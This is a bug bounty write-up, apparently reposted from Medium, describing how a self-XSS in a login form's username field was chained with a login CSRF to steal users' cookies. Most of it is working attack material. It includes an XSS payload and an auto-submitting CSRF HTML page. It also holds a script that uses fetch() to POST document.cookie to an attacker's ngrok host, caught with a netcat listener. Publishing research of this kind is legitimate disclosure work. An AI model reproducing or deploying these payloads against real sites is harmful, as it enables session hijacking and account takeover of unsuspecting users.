🔎From Self XSS to Account Take Over(ATO)

source: https://melguerdawi.medium.com/from-self-xss-to-account-take-over-ato-812c194b61cf

Hello there ,

I’m Mostafa Elguerdawi, Today , I would like to share about one of my recent finding in

HackerOne ‘s program

Let’s say : https://reacted.com

When I’m testing on this site, there is a login function, as normal I tried login bypass using Response Manipulation, Default Credentials, and SQL Injection.

but nothing work, I decided to examine the source code and found of the username that I entered a little while ago printed inside the value attribute.

I thought about trying an XSS injection so, I attempted to inject a double quote(“) within the username, I found that there is no filtering on it.

So, I thought about injecting ‘<’, which might also work.

Indeed, it worked!

So, I attempted to injecting a complete payload :

"> <svg/onload=alert("XSS")>

And it also succeeded!

Unfortunately, this is a self-XSS

Escalation phase

I ran my Burp Suite and intercepted the request during the login attempt.

From the request, I noticed that there is no protection against CSRF, which is expected from a login function.

I attempted to escalate the self-XSS to reflected XSS using CSRF.

The payload used :

<html>
  <body>
     <form name='myForm' id='myForm' method="POST" action="https://reacted.com/authenticate">
        <input type="hidden" name="loginName" value="&#x22;&#x20;><svg/onmouseover=alert(1)&#x20;&#x22;>   
        <input type="hidden" name="loginPassword" value="test"/>
        <input name="loginForm" class="btn btn-success" type="submit" value="Log in"/>
                </form>
        <script>
           document.addEventListener('DOMContentLoaded', function(event) {
            document.createElement('form').submit.call(document.getElementById('myForm'));
            });
        </script>       
  </body>
<html>

Yes, it worked!

with the help of ngrok, I managed to obtain anyone’s cookies

I opened two terminal tabs

first : ngrok http 80

second : sudo nc -nlvp 80

I used this payload in username :

&#x22;&#x20;> <script>&#x0a;fetch(‘https://<ngrok-Domain>', { method: ‘POST’, mode: ‘no-cors’, body:document.cookie });&#x0a;</script>&#x20;&#x22;

&#x22;&#x20; : is a double quote and white space encoded in html

This payload retrieves the user’s cookies and sends them to me. With the help of netcat(nc), I can obtain these cookies.

final payload :

<html>
 <body>
  <form name='myForm' id='myForm' method="POST" action="https://reacted.com/authenticate">
   <input type="hidden" name="loginName" value="&#x22;&#x20;> <script>&#x0a;fetch('https://<ngrok-host>', { method: 'POST', mode: 'no-cors', body:document.cookie });&#x0a;</script>&#x20;&#x22;"/>
   <input type="hidden" name="loginPassword" value="test"/>
   <input name="loginForm" class="btn btn-success" type="submit" value="Log in"/>
  </form>
  <script>
   document.addEventListener('DOMContentLoaded', function(event) {
    document.createElement('form').submit.call(document.getElementById('myForm'));
    });
  </script>
 </body>
<html>

Finally, I managed to obtain the cookies.